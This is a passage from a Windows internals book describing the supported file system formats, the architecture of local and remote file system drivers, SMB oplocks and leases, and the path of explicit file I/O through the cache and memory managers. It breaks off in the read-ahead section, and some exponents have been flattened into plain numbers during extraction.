Windows includes support for the following file system formats:
■ CDFS
■ UDF
■ FAT12, FAT16, and FAT32
■ exFAT
■ NTFS
■ ReFS
Each of these formats is best suited for certain environments, as you’ll see
in the following sections.
CDFS
CDFS (%SystemRoot%\System32\Drivers\Cdfs.sys), or CD-ROM file
system, is a read-only file system driver that supports a superset of the ISO-
9660 format as well as a superset of the Joliet disk format. Although the ISO-
9660 format is relatively simple and has limitations such as ASCII uppercase
names with a maximum length of 32 characters, Joliet is more flexible and
supports Unicode names of arbitrary length. If structures for both formats are
present on a disk (to offer maximum compatibility), CDFS uses the Joliet
format. CDFS has a couple of restrictions:
■ A maximum file size of 4 GB
■ A maximum of 65,535 directories
CDFS is considered a legacy format because the industry has adopted the
Universal Disk Format (UDF) as the standard for optical media.
UDF
The Windows Universal Disk Format (UDF) file system implementation is
OSTA (Optical Storage Technology Association) UDF-compliant. (UDF is a
subset of the ISO-13346 format with extensions for formats such as CD-R
and DVD-R/RW.) OSTA defined UDF in 1995 as a format to replace the
ISO-9660 format for magneto-optical storage media, mainly DVD-ROM.
UDF is included in the DVD specification and is more flexible than CDFS.
The UDF file system format has the following traits:
■ Directory and file names can be 254 ASCII or 127 Unicode characters
long.
■ Files can be sparse. (Sparse files are defined later in this chapter, in
the “Compression and sparse files” section.)
■ File sizes are specified with 64 bits.
■ Support for access control lists (ACLs).
■ Support for alternate data streams.
The UDF driver supports UDF versions up to 2.60. The UDF format was
designed with rewritable media in mind. The Windows UDF driver
(%SystemRoot%\System32\Drivers\Udfs.sys) provides read-write support
for Blu-ray, DVD-RAM, CD-R/RW, and DVD+-R/RW drives when using
UDF 2.50 and read-only support when using UDF 2.60. However, Windows
does not implement support for certain UDF features such as named streams
and access control lists.
FAT12, FAT16, and FAT32
Windows supports the FAT file system primarily for compatibility with other
operating systems in multiboot systems, and as a format for flash drives or
memory cards. The Windows FAT file system driver is implemented in
%SystemRoot%\System32\Drivers\Fastfat.sys.
The name of each FAT format includes a number that indicates the number
of bits that the particular format uses to identify clusters on a disk. FAT12’s
12-bit cluster identifier limits a partition to storing a maximum of 212 (4,096)
clusters. Windows permits cluster sizes from 512 bytes to 8 KB, which limits
a FAT12 volume size to 32 MB.
Note
All FAT file system types reserve the first 2 clusters and the last 16
clusters of a volume, so the number of usable clusters for a FAT12
volume, for instance, is slightly less than 4,096.
FAT16, with a 16-bit cluster identifier, can address 216 (65,536) clusters.
On Windows, FAT16 cluster sizes range from 512 bytes (the sector size) to
64 KB (on disks with a 512-byte sector size), which limits FAT16 volume
sizes to 4 GB. Disks with a sector size of 4,096 bytes allow for clusters of
256 KB. The cluster size Windows uses depends on the size of a volume. The
various sizes are listed in Table 11-2. If you format a volume that is less than
16 MB as FAT by using the format command or the Disk Management snap-
in, Windows uses the FAT12 format instead of FAT16.
Table 11-2 Default FAT16 cluster sizes in Windows
Volume Size
Default Cluster Size
<8 MB
Not supported
8 MB–32 MB
512 bytes
32 MB–64 MB
1 KB
64 MB–128 MB
2 KB
128 MB–256 MB
4 KB
256 MB–512 MB
8 KB
512 MB–1,024 MB
16 KB
1 GB–2 GB
32 KB
2 GB–4 GB
64 KB
>16 GB
Not supported
A FAT volume is divided into several regions, which are shown in Figure
11-14. The file allocation table, which gives the FAT file system format its
name, has one entry for each cluster on a volume. Because the file allocation
table is critical to the successful interpretation of a volume’s contents, the
FAT format maintains two copies of the table so that if a file system driver or
consistency-checking program (such as Chkdsk) can’t access one (because of
a bad disk sector, for example), it can read from the other.
Figure 11-14 FAT format organization.
Entries in the file allocation table define file-allocation chains (shown in
Figure 11-15) for files and directories, where the links in the chain are
indexes to the next cluster of a file’s data. A file’s directory entry stores the
starting cluster of the file. The last entry of the file’s allocation chain is the
reserved value of 0xFFFF for FAT16 and 0xFFF for FAT12. The FAT
entries for unused clusters have a value of 0. You can see in Figure 11-15
that FILE1 is assigned clusters 2, 3, and 4; FILE2 is fragmented and uses
clusters 5, 6, and 8; and FILE3 uses only cluster 7. Reading a file from a
FAT volume can involve reading large portions of a file allocation table to
traverse the file’s allocation chains.
Figure 11-15 Sample FAT file-allocation chains.
The root directory of FAT12 and FAT16 volumes is preassigned enough
space at the start of a volume to store 256 directory entries, which places an
upper limit on the number of files and directories that can be stored in the
root directory. (There’s no preassigned space or size limit on FAT32 root
directories.) A FAT directory entry is 32 bytes and stores a file’s name, size,
starting cluster, and time stamp (last-accessed, created, and so on)
information. If a file has a name that is Unicode or that doesn’t follow the
MS-DOS 8.3 naming convention, additional directory entries are allocated to
store the long file name. The supplementary entries precede the file’s main
entry. Figure 11-16 shows a sample directory entry for a file named “The
quick brown fox.” The system has created a THEQUI~1.FOX 8.3
representation of the name (that is, you don’t see a “.” in the directory entry
because it is assumed to come after the eighth character) and used two more
directory entries to store the Unicode long file name. Each row in the figure
is made up of 16 bytes.
Figure 11-16 FAT directory entry.
FAT32 uses 32-bit cluster identifiers but reserves the high 4 bits, so in
effect it has 28-bit cluster identifiers. Because FAT32 cluster sizes can be as
large as 64 KB, FAT32 has a theoretical ability to address 16-terabyte (TB)
volumes. Although Windows works with existing FAT32 volumes of larger
sizes (created in other operating systems), it limits new FAT32 volumes to a
maximum of 32 GB. FAT32’s higher potential cluster numbers let it manage
disks more efficiently than FAT16; it can handle up to 128-GB volumes with
512-byte clusters. Table 11-3 shows default cluster sizes for FAT32 volumes.
Table 11-3 Default cluster sizes for FAT32 volumes
Partition Size
Default Cluster Size
<32 MB
Not supported
32 MB–64 MB
512 bytes
64 MB–128 MB
1 KB
128 MB–256 MB
2 KB
256 MB–8 GB
4 KB
8 GB–16 GB
8 KB
16 GB–32 GB
16 KB
>32 GB
Not supported
Besides the higher limit on cluster numbers, other advantages FAT32 has
over FAT12 and FAT16 include the fact that the FAT32 root directory isn’t
stored at a predefined location on the volume, the root directory doesn’t have
an upper limit on its size, and FAT32 stores a second copy of the boot sector
for reliability. A limitation FAT32 shares with FAT16 is that the maximum
file size is 4 GB because directories store file sizes as 32-bit values.
exFAT
Designed by Microsoft, the Extended File Allocation Table file system
(exFAT, also called FAT64) is an improvement over the traditional FAT file
systems and is specifically designed for flash drives. The main goal of exFAT
is to provide some of the advanced functionality offered by NTFS without the
metadata structure overhead and metadata logging that create write patterns
not suited for many flash media devices. Table 11-4 lists the default cluster
sizes for exFAT.
As the FAT64 name implies, the file size limit is increased to 264, allowing
files up to 16 exabytes. This change is also matched by an increase in the
maximum cluster size, which is currently implemented as 32 MB but can be
as large as 2255 sectors. exFAT also adds a bitmap that tracks free clusters,
which improves the performance of allocation and deletion operations.
Finally, exFAT allows more than 1,000 files in a single directory. These
characteristics result in increased scalability and support for large disk sizes.
Table 11-4 Default cluster sizes for exFAT volumes, 512-byte sector
Volume Size
Default Cluster Size
< 256 MB
4 KB
256 MB–32 GB
32 KB
32 GB–512 GB
128 KB
512 GB–1 TB
256 KB
1 TB–2 TB
512 KB
2 TB–4 TB
1 MB
4 TB–8 TB
2 MB
8 TB–16 TB
4 MB
16 TB–32 TB
8 MB
32 TB–64 TB
16 MB
>= 64 TB
32 MB
Additionally, exFAT implements certain features previously available only
in NTFS, such as support for access control lists (ACLs) and transactions
(called Transaction-Safe FAT, or TFAT). While the Windows Embedded CE
implementation of exFAT includes these features, the version of exFAT in
Windows does not.
Note
ReadyBoost (described in Chapter 5 of Part 1, “Memory Management”)
can work with exFAT-formatted flash drives to support cache files much
larger than 4 GB.
NTFS
As noted at the beginning of the chapter, the NTFS file system is one of the
native file system formats of Windows. NTFS uses 64-bit cluster numbers.
This capacity gives NTFS the ability to address volumes of up to 16
exaclusters; however, Windows limits the size of an NTFS volume to that
addressable with 32-bit clusters, which is slightly less than 8 petabytes (using
2 MB clusters). Table 11-5 shows the default cluster sizes for NTFS volumes.
(You can override the default when you format an NTFS volume.) NTFS also
supports 232–1 files per volume. The NTFS format allows for files that are 16
exabytes in size, but the implementation limits the maximum file size to 16
TB.
Table 11-5 Default cluster sizes for NTFS volumes
Volume Size
Default Cluster Size
<7 MB
Not supported
7 MB–16 TB
4 KB
16 TB–32 TB
8 KB
32 TB–64 TB
16 KB
64 TB–128 TB
32 KB
128 TB–256 TB
64 KB
256 TB–512 TB
128 KB
512 TB–1024 TB
256 KB
1 PB–2 PB
512 KB
2 PB–4 PB
1 MB
4 PB–8 PB
2 MB
NTFS includes a number of advanced features, such as file and directory
security, alternate data streams, disk quotas, sparse files, file compression,
symbolic (soft) and hard links, support for transactional semantics, junction
points, and encryption. One of its most significant features is recoverability.
If a system is halted unexpectedly, the metadata of a FAT volume can be left
in an inconsistent state, leading to the corruption of large amounts of file and
directory data. NTFS logs changes to metadata in a transactional manner so
that file system structures can be repaired to a consistent state with no loss of
file or directory structure information. (File data can be lost unless the user is
using TxF, which is covered later in this chapter.) Additionally, the NTFS
driver in Windows also implements self-healing, a mechanism through which
it makes most minor repairs to corruption of file system on-disk structures
while Windows is running and without requiring a reboot.
Note
At the time of this writing, the common physical sector size of disk
devices is 4 KB. Even for these disk devices, for compatibility reasons,
the storage stack exposes to file system drivers a logical sector size of 512
bytes. The calculation performed by the NTFS driver to determine the
correct size of the cluster uses logical sector sizes rather than the actual
physical size.
Starting with Windows 10, NTFS supports DAX volumes natively. (DAX
volumes are discussed later in this chapter, in the “DAX volumes” section.)
The NTFS file system driver also supports I/O to this kind of volume using
large pages. Mapping a file that resides on a DAX volume using large pages
is possible in two ways: NTFS can automatically align the file to a 2-MB
cluster boundary, or the volume can be formatted using a 2-MB cluster size.
ReFS
The Resilient File System (ReFS) is another file system that Windows
supports natively. It has been designed primarily for large storage servers
with the goal to overcome some limitations of NTFS, like its lack of online
self-healing or volume repair or the nonsupport for file snapshots. ReFS is a
“write-to-new” file system, which means that volume metadata is always
updated by writing new data to the underlying medium and by marking the
old metadata as deleted. The lower level of the ReFS file system (which
understands the on-disk data structure) uses an object store library, called
Minstore, that provides a key-value table interface to its callers. Minstore is
similar to a modern database engine, is portable, and uses different data
structures and algorithms compared to NTFS. (Minstore uses B+ trees.)
One of the important design goals of ReFS was to be able to support huge
volumes (that could have been created by Storage Spaces). Like NTFS, ReFS
uses 64-bit cluster numbers and can address volumes of up 16 exaclusters.
ReFS has no limitation on the size of the addressable values, so,
theoretically, ReFS is able to manage volumes of up to 1 yottabyte (using 64
KB cluster sizes).
Unlike NTFS, Minstore doesn’t need a central location to store its own
metadata on the volume (although the object table could be considered
somewhat centralized) and has no limitations on addressable values, so there
is no need to support many different sized clusters. ReFS supports only 4 KB
and 64 KB cluster sizes. ReFS, at the time of this writing, does not support
DAX volumes.
We describe NTFS and ReFS data structures and their advanced features
in detail later in this chapter.
File system driver architecture
File system drivers (FSDs) manage file system formats. Although FSDs run
in kernel mode, they differ in a number of ways from standard kernel-mode
drivers. Perhaps most significant, they must register as an FSD with the I/O
manager, and they interact more extensively with the memory manager. For
enhanced performance, file system drivers also usually rely on the services of
the cache manager. Thus, they use a superset of the exported Ntoskrnl.exe
functions that standard drivers use. Just as for standard kernel-mode drivers,
you must have the Windows Driver Kit (WDK) to build file system drivers.
(See Chapter 1, “Concepts and Tools,” in Part 1 and
http://www.microsoft.com/whdc/devtools/wdk for more information on the
WDK.)
Windows has two different types of FSDs:
■ Local FSDs manage volumes directly connected to the computer.
■ Network FSDs allow users to access data volumes connected to
remote computers.
Local FSDs
Local FSDs include Ntfs.sys, Refs.sys, Refsv1.sys, Fastfat.sys, Exfat.sys,
Udfs.sys, Cdfs.sys, and the RAW FSD (integrated in Ntoskrnl.exe). Figure
11-17 shows a simplified view of how local FSDs interact with the I/O
manager and storage device drivers. A local FSD is responsible for
registering with the I/O manager. Once the FSD is registered, the I/O
manager can call on it to perform volume recognition when applications or
the system initially access the volumes. Volume recognition involves an
examination of a volume’s boot sector and often, as a consistency check, the
file system metadata. If none of the registered file systems recognizes the
volume, the system assigns the RAW file system driver to the volume and
then displays a dialog box to the user asking if the volume should be
formatted. If the user chooses not to format the volume, the RAW file system
driver provides access to the volume, but only at the sector level—in other
words, the user can only read or write complete sectors.
Figure 11-17 Local FSD.
The goal of file system recognition is to allow the system to have an
additional option for a valid but unrecognized file system other than RAW.
To achieve this, the system defines a fixed data structure type
(FILE_SYSTEM_RECOGNITION_STRUCTURE) that is written to the first
sector on the volume. This data structure, if present, would be recognized by
the operating system, which would then notify the user that the volume
contains a valid but unrecognized file system. The system will still load the
RAW file system on the volume, but it will not prompt the user to format the
volume. A user application or kernel-mode driver might ask for a copy of the
FILE_SYSTEM_RECOGNITION_STRUCTURE by using the new file system
I/O control code FSCTL_QUERY_FILE_SYSTEM_RECOGNITION.
The first sector of every Windows-supported file system format is reserved
as the volume’s boot sector. A boot sector contains enough information so
that a local FSD can both identify the volume on which the sector resides as
containing a format that the FSD manages and locate any other metadata
necessary to identify where metadata is stored on the volume.
When a local FSD (shown in Figure 11-17) recognizes a volume, it creates
a device object that represents the mounted file system format. The I/O
manager makes a connection through the volume parameter block (VPB)
between the volume’s device object (which is created by a storage device
driver) and the device object that the FSD created. The VPB’s connection
results in the I/O manager redirecting I/O requests targeted at the volume
device object to the FSD device object.
To improve performance, local FSDs usually use the cache manager to
cache file system data, including metadata. FSDs also integrate with the
memory manager so that mapped files are implemented correctly. For
example, FSDs must query the memory manager whenever an application
attempts to truncate a file to verify that no processes have mapped the part of
the file beyond the truncation point. (See Chapter 5 of Part 1 for more
information on the memory manager.) Windows doesn’t permit file data that
is mapped by an application to be deleted either through truncation or file
deletion.
Local FSDs also support file system dismount operations, which permit
the system to disconnect the FSD from the volume object. A dismount occurs
whenever an application requires raw access to the on-disk contents of a
volume or the media associated with a volume is changed. The first time an
application accesses the media after a dismount, the I/O manager reinitiates a
volume mount operation for the media.
Remote FSDs
Each remote FSD consists of two components: a client and a server. A client-
side remote FSD allows applications to access remote files and directories.
The client FSD component accepts I/O requests from applications and
translates them into network file system protocol commands (such as SMB)
that the FSD sends across the network to a server-side component, which is a
remote FSD. A server-side FSD listens for commands coming from a
network connection and fulfills them by issuing I/O requests to the local FSD
that manages the volume on which the file or directory that the command is
intended for resides.
Windows includes a client-side remote FSD named LANMan Redirector
(usually referred to as just the redirector) and a server-side remote FSD
named LANMan Server (%SystemRoot%\System32\Drivers\Srv2.sys).
Figure 11-18 shows the relationship between a client accessing files remotely
from a server through the redirector and server FSDs.
Figure 11-18 Common Internet File System file sharing.
Windows relies on the Common Internet File System (CIFS) protocol to
format messages exchanged between the redirector and the server. CIFS is a
version of Microsoft’s Server Message Block (SMB) protocol. (For more
information on SMB, go to https://docs.microsoft.com/en-
us/windows/win32/fileio/microsoft-smb-protocol-and-cifs-protocol-
overview.)
Like local FSDs, client-side remote FSDs usually use cache manager
services to locally cache file data belonging to remote files and directories,
and in such cases both must implement a distributed locking mechanism on
the client as well as the server. SMB client-side remote FSDs implement a
distributed cache coherency protocol, called oplock (opportunistic locking),
so that the data an application sees when it accesses a remote file is the same
as the data applications running on other computers that are accessing the
same file see. Third-party file systems may choose to use the oplock
protocol, or they may implement their own protocol. Although server-side
remote FSDs participate in maintaining cache coherency across their clients,
they don’t cache data from the local FSDs because local FSDs cache their
own data.
It is fundamental that whenever a resource can be shared between multiple,
simultaneous accessors, a serialization mechanism must be provided to
arbitrate writes to that resource to ensure that only one accessor is writing to
the resource at any given time. Without this mechanism, the resource may be
corrupted. The locking mechanisms used by all file servers implementing the
SMB protocol are the oplock and the lease. Which mechanism is used
depends on the capabilities of both the server and the client, with the lease
being the preferred mechanism.
Oplocks
The oplock functionality is implemented in the file system run-time library
(FsRtlXxx functions) and may be used by any file system driver. The client of
a remote file server uses an oplock to dynamically determine which client-
side caching strategy to use to minimize network traffic. An oplock is
requested on a file residing on a share, by the file system driver or redirector,
on behalf of an application when it attempts to open a file. The granting of an
oplock allows the client to cache the file rather than send every read or write
to the file server across the network. For example, a client could open a file
for exclusive access, allowing the client to cache all reads and writes to the
file, and then copy the updates to the file server when the file is closed. In
contrast, if the server does not grant an oplock to a client, all reads and writes
must be sent to the server.
Once an oplock has been granted, a client may then start caching the file,
with the type of oplock determining what type of caching is allowed. An
oplock is not necessarily held until a client is finished with the file, and it
may be broken at any time if the server receives an operation that is
incompatible with the existing granted locks. This implies that the client must
be able to quickly react to the break of the oplock and change its caching
strategy dynamically.
Prior to SMB 2.1, there were four types of oplocks:
■ Level 1, exclusive access This lock allows a client to open a file for
exclusive access. The client may perform read-ahead buffering and
read or write caching.
■ Level 2, shared access This lock allows multiple, simultaneous
readers of a file and no writers. The client may perform read-ahead
buffering and read caching of file data and attributes. A write to the
file will cause the holders of the lock to be notified that the lock has
been broken.
■ Batch, exclusive access This lock takes its name from the locking
used when processing batch (.bat) files, which are opened and closed
to process each line within the file. The client may keep a file open on
the server, even though the application has (perhaps temporarily)
closed the file. This lock supports read, write, and handle caching.
■ Filter, exclusive access This lock provides applications and file
system filters with a mechanism to give up the lock when other clients
try to access the same file, but unlike a Level 2 lock, the file cannot be
opened for delete access, and the other client will not receive a
sharing violation. This lock supports read and write caching.
In the simplest terms, if multiple client systems are all caching the same
file shared by a server, then as long as every application accessing the file
(from any client or the server) tries only to read the file, those reads can be
satisfied from each system’s local cache. This drastically reduces the network
traffic because the contents of the file aren’t sent to each system from the
server. Locking information must still be exchanged between the client
systems and the server, but this requires very low network bandwidth.
However, if even one of the clients opens the file for read and write access
(or exclusive write), then none of the clients can use their local caches and all
I/O to the file must go immediately to the server, even if the file is never
written. (Lock modes are based upon how the file is opened, not individual
I/O requests.)
An example, shown in Figure 11-19, will help illustrate oplock operation.
The server automatically grants a Level 1 oplock to the first client to open a
server file for access. The redirector on the client caches the file data for both
reads and writes in the file cache of the client machine. If a second client
opens the file, it too requests a Level 1 oplock. However, because there are
now two clients accessing the same file, the server must take steps to present
a consistent view of the file’s data to both clients. If the first client has
written to the file, as is the case in Figure 11-19, the server revokes its oplock
and grants neither client an oplock. When the first client’s oplock is revoked,
or broken, the client flushes any data it has cached for the file back to the
server.
Figure 11-19 Oplock example.
If the first client hadn’t written to the file, the first client’s oplock would
have been broken to a Level 2 oplock, which is the same type of oplock the
server would grant to the second client. Now both clients can cache reads,
but if either writes to the file, the server revokes their oplocks so that
noncached operation commences. Once oplocks are broken, they aren’t
granted again for the same open instance of a file. However, if a client closes
a file and then reopens it, the server reassesses what level of oplock to grant
the client based on which other clients have the file open and whether at least
one of them has written to the file.
EXPERIMENT: Viewing the list of registered file
systems
When the I/O manager loads a device driver into memory, it
typically names the driver object it creates to represent the driver so
that it’s placed in the \Driver object manager directory. The driver
objects for any driver the I/O manager loads that have a Type
attribute value of SERVICE_FILE_SYSTEM_DRIVER (2) are
placed in the \FileSystem directory by the I/O manager. Thus, using
a tool such as WinObj (from Sysinternals), you can see the file
systems that have registered on a system, as shown in the following
screenshot. Note that file system filter drivers will also show up in
this list. Filter drivers are described later in this section.
Another way to see registered file systems is to run the System
Information viewer. Run Msinfo32 from the Start menu’s Run
dialog box and select System Drivers under Software
Environment. Sort the list of drivers by clicking the Type column,
and drivers with a Type attribute of
SERVICE_FILE_SYSTEM_DRIVER group together.
Note that just because a driver registers as a file system driver
type doesn’t mean that it is a local or remote FSD. For example,
Npfs (Named Pipe File System) is a driver that implements named
pipes through a file system-like private namespace. As mentioned
previously, this list will also include file system filter drivers.
Leases
Prior to SMB 2.1, the SMB protocol assumed an error-free network
connection between the client and the server and did not tolerate network
disconnections caused by transient network failures, server reboot, or cluster
failovers. When a network disconnect event was received by the client, it
orphaned all handles opened to the affected server(s), and all subsequent I/O
operations on the orphaned handles were failed. Similarly, the server would
release all opened handles and resources associated with the disconnected
user session. This behavior resulted in applications losing state and in
unnecessary network traffic.
In SMB 2.1, the concept of a lease is introduced as a new type of client
caching mechanism, similar to an oplock. The purpose of a lease and an
oplock is the same, but a lease provides greater flexibility and much better
performance.
■ Read (R), shared access Allows multiple simultaneous readers of a
file, and no writers. This lease allows the client to perform read-ahead
buffering and read caching.
■ Read-Handle (RH), shared access This is similar to the Level 2
oplock, with the added benefit of allowing the client to keep a file
open on the server even though the accessor on the client has closed
the file. (The cache manager will lazily flush the unwritten data and
purge the unmodified cache pages based on memory availability.)
This is superior to a Level 2 oplock because the lease does not need to
be broken between opens and closes of the file handle. (In this
respect, it provides semantics similar to the Batch oplock.) This type
of lease is especially useful for files that are repeatedly opened and
closed because the cache is not invalidated when the file is closed and
refilled when the file is opened again, providing a big improvement in
performance for complex I/O intensive applications.
■ Read-Write (RW), exclusive access This lease allows a client to
open a file for exclusive access. This lock allows the client to perform
read-ahead buffering and read or write caching.
■ Read-Write-Handle (RWH), exclusive access This lock allows a
client to open a file for exclusive access. This lease supports read,
write, and handle caching (similar to the Read-Handle lease).
Another advantage that a lease has over an oplock is that a file may be
cached, even when there are multiple handles opened to the file on the client.
(This is a common behavior in many applications.) This is implemented
through the use of a lease key (implemented using a GUID), which is created
by the client and associated with the File Control Block (FCB) for the cached
file, allowing all handles to the same file to share the same lease state, which
provides caching by file rather than caching by handle. Prior to the
introduction of the lease, the oplock was broken whenever a new handle was
opened to the file, even from the same client. Figure 11-20 shows the oplock
behavior, and Figure 11-21 shows the new lease behavior.
Figure 11-20 Oplock with multiple handles from the same client.
Figure 11-21 Lease with multiple handles from the same client.
Prior to SMB 2.1, oplocks could only be granted or broken, but leases can
also be converted. For example, a Read lease may be converted to a Read-
Write lease, which greatly reduces network traffic because the cache for a
particular file does not need to be invalidated and refilled, as would be the
case with an oplock break (of the Level 2 oplock), followed by the request
and grant of a Level 1 oplock.
File system operations
Applications and the system access files in two ways: directly, via file I/O
functions (such as ReadFile and WriteFile), and indirectly, by reading or
writing a portion of their address space that represents a mapped file section.
(See Chapter 5 of Part 1 for more information on mapped files.) Figure 11-22
is a simplified diagram that shows the components involved in these file
system operations and the ways in which they interact. As you can see, an
FSD can be invoked through several paths:
■ From a user or system thread performing explicit file I/O
■ From the memory manager’s modified and mapped page writers
■ Indirectly from the cache manager’s lazy writer
■ Indirectly from the cache manager’s read-ahead thread
■ From the memory manager’s page fault handler
Figure 11-22 Components involved in file system I/O.
The following sections describe the circumstances surrounding each of
these scenarios and the steps FSDs typically take in response to each one.
You’ll see how much FSDs rely on the memory manager and the cache
manager.
Explicit file I/O
The most obvious way an application accesses files is by calling Windows
I/O functions such as CreateFile, ReadFile, and WriteFile. An application
opens a file with CreateFile and then reads, writes, or deletes the file by
passing the handle returned from CreateFile to other Windows functions. The
CreateFile function, which is implemented in the Kernel32.dll Windows
client-side DLL, invokes the native function NtCreateFile, forming a
complete root-relative path name for the path that the application passed to it
(processing “.” and “..” symbols in the path name) and prefixing the path
with “\??” (for example, \??\C:\Daryl\Todo.txt).
The NtCreateFile system service uses ObOpenObjectByName to open the
file, which parses the name starting with the object manager root directory
and the first component of the path name (“??”). Chapter 8, “System
mechanisms”, includes a thorough description of object manager name
resolution and its use of process device maps, but we’ll review the steps it
follows here with a focus on volume drive letter lookup.
The first step the object manager takes is to translate \?? to the process’s
per-session namespace directory that the DosDevicesDirectory field of the
device map structure in the process object references (which was propagated
from the first process in the logon session by using the logon session
references field in the logon session’s token). Only volume names for
network shares and drive letters mapped by the Subst.exe utility are typically
stored in the per-session directory, so on those systems when a name (C: in
this example) is not present in the per-session directory, the object manager
restarts its search in the directory referenced by the
GlobalDosDevicesDirectory field of the device map associated with the per-
session directory. The GlobalDosDevicesDirectory field always points at the
\GLOBAL?? directory, which is where Windows stores volume drive letters
for local volumes. (See the section “Session namespace” in Chapter 8 for
more information.) Processes can also have their own device map, which is
an important characteristic during impersonation over protocols such as RPC.
The symbolic link for a volume drive letter points to a volume device
object under \Device, so when the object manager encounters the volume
object, the object manager hands the rest of the path name to the parse
function that the I/O manager has registered for device objects,
IopParseDevice. (In volumes on dynamic disks, a symbolic link points to an
intermediary symbolic link, which points to a volume device object.) Figure
11-23 shows how volume objects are accessed through the object manager
namespace. The figure shows how the \GLOBAL??\C: symbolic link points
to the \Device\HarddiskVolume6 volume device object.
Figure 11-23 Drive-letter name resolution.
After locking the caller’s security context and obtaining security
information from the caller’s token, IopParseDevice creates an I/O request
packet (IRP) of type IRP_MJ_CREATE, creates a file object that stores the
name of the file being opened, follows the VPB of the volume device object
to find the volume’s mounted file system device object, and uses
IoCallDriver to pass the IRP to the file system driver that owns the file
system device object.
When an FSD receives an IRP_MJ_CREATE IRP, it looks up the specified
file, performs security validation, and if the file exists and the user has
permission to access the file in the way requested, returns a success status
code. The object manager creates a handle for the file object in the process’s
handle table, and the handle propagates back through the calling chain,
finally reaching the application as a return parameter from CreateFile. If the
file system fails the create operation, the I/O manager deletes the file object it
created for the file.
We’ve skipped over the details of how the FSD locates the file being
opened on the volume, but a ReadFile function call operation shares many of
the FSD’s interactions with the cache manager and storage driver. Both
ReadFile and CreateFile are system calls that map to I/O manager functions,
but the NtReadFile system service doesn’t need to perform a name lookup; it
calls on the object manager to translate the handle passed from ReadFile into
a file object pointer. If the handle indicates that the caller obtained
permission to read the file when the file was opened, NtReadFile proceeds to
create an IRP of type IRP_MJ_READ and sends it to the FSD for the volume
on which the file resides. NtReadFile obtains the FSD’s device object, which
is stored in the file object, and calls IoCallDriver, and the I/O manager
locates the FSD from the device object and gives the IRP to the FSD.
If the file being read can be cached (that is, the
FILE_FLAG_NO_BUFFERING flag wasn’t passed to CreateFile when the
file was opened), the FSD checks to see whether caching has already been
initiated for the file object. The PrivateCacheMap field in a file object points
to a private cache map data structure (which we described in the previous
section) if caching is initiated for a file object. If the FSD hasn’t initialized
caching for the file object (which it does the first time a file object is read
from or written to), the PrivateCacheMap field will be null. The FSD calls
the cache manager’s CcInitializeCacheMap function to initialize caching,
which involves the cache manager creating a private cache map and, if
another file object referring to the same file hasn’t initiated caching, a shared
cache map and a section object.
After it has verified that caching is enabled for the file, the FSD copies the
requested file data from the cache manager’s virtual memory to the buffer
that the thread passed to the ReadFile function. The file system performs the
copy within a try/except block so that it catches any faults that are the result
of an invalid application buffer. The function the file system uses to perform
the copy is the cache manager’s CcCopyRead function. CcCopyRead takes as
parameters a file object, file offset, and length.
When the cache manager executes CcCopyRead, it retrieves a pointer to a
shared cache map, which is stored in the file object. Recall that a shared
cache map stores pointers to virtual address control blocks (VACBs), with
one VACB entry for each 256 KB block of the file. If the VACB pointer for
a portion of a file being read is null, CcCopyRead allocates a VACB,
reserving a 256 KB view in the cache manager’s virtual address space, and
maps (using MmMapViewInSystemCache) the specified portion of the file
into the view. Then CcCopyRead simply copies the file data from the
mapped view to the buffer it was passed (the buffer originally passed to
ReadFile). If the file data isn’t in physical memory, the copy operation
generates page faults, which are serviced by MmAccessFault.
When a page fault occurs, MmAccessFault examines the virtual address
that caused the fault and locates the virtual address descriptor (VAD) in the
VAD tree of the process that caused the fault. (See Chapter 5 of Part 1 for
more information on VAD trees.) In this scenario, the VAD describes the
cache manager’s mapped view of the file being read, so MmAccessFault calls
MiDispatchFault to handle a page fault on a valid virtual memory address.
MiDispatchFault locates the control area (which the VAD points to) and
through the control area finds a file object representing the open file. (If the
file has been opened more than once, there might be a list of file objects
linked through pointers in their private cache maps.)
With the file object in hand, MiDispatchFault calls the I/O manager
function IoPageRead to build an IRP (of type IRP_MJ_READ) and sends the
IRP to the FSD that owns the device object the file object points to. Thus, the
file system is reentered to read the data that it requested via CcCopyRead, but
this time the IRP is marked as noncached and paging I/O. These flags signal
the FSD that it should retrieve file data directly from disk, and it does so by
determining which clusters on disk contain the requested data (the exact
mechanism is file-system dependent) and sending IRPs to the volume
manager that owns the volume device object on which the file resides. The
volume parameter block (VPB) field in the FSD’s device object points to the
volume device object.
The memory manager waits for the FSD to complete the IRP read and then
returns control to the cache manager, which continues the copy operation that
was interrupted by a page fault. When CcCopyRead completes, the FSD
returns control to the thread that called NtReadFile, having copied the
requested file data, with the aid of the cache manager and the memory
manager, to the thread’s buffer.
The path for WriteFile is similar except that the NtWriteFile system
service generates an IRP of type IRP_MJ_WRITE, and the FSD calls
CcCopyWrite instead of CcCopyRead. CcCopyWrite, like CcCopyRead,
ensures that the portions of the file being written are mapped into the cache
and then copies to the cache the buffer passed to WriteFile.
If a file’s data is already cached (in the system’s working set), there are
several variants on the scenario we’ve just described. If a file’s data is
already stored in the cache, CcCopyRead doesn’t incur page faults. Also,
under certain conditions, NtReadFile and NtWriteFile call an FSD’s fast I/O
entry point instead of immediately building and sending an IRP to the FSD.
Some of these conditions follow: the portion of the file being read must
reside in the first 4 GB of the file, the file can have no locks, and the portion
of the file being read or written must fall within the file’s currently allocated
size.
The fast I/O read and write entry points for most FSDs call the cache
manager’s CcFastCopyRead and CcFastCopyWrite functions. These variants
on the standard copy routines ensure that the file’s data is mapped in the file
system cache before performing a copy operation. If this condition isn’t met,
CcFastCopyRead and CcFastCopyWrite indicate that fast I/O isn’t possible.
When fast I/O isn’t possible, NtReadFile and NtWriteFile fall back on
creating an IRP. (See the earlier section “Fast I/O” for a more complete
description of fast I/O.)
Memory manager’s modified and mapped page
writer
The memory manager’s modified and mapped page writer threads wake up
periodically (and when available memory runs low) to flush modified pages
to their backing store on disk. The threads call IoAsynchronousPageWrite to
create IRPs of type IRP_MJ_WRITE and write pages to either a paging file or
a file that was modified after being mapped. Like the IRPs that
MiDispatchFault creates, these IRPs are flagged as noncached and paging
I/O. Thus, an FSD bypasses the file system cache and issues IRPs directly to
a storage driver to write the memory to disk.
Cache manager’s lazy writer
The cache manager’s lazy writer thread also plays a role in writing modified
pages because it periodically flushes views of file sections mapped in the
cache that it knows are dirty. The flush operation, which the cache manager
performs by calling MmFlushSection, triggers the memory manager to write
any modified pages in the portion of the section being flushed to disk. Like
the modified and mapped page writers, MmFlushSection uses
IoSynchronousPageWrite to send the data to the FSD.
Cache manager’s read-ahead thread
A cache uses two artifacts of how programs reference code and data:
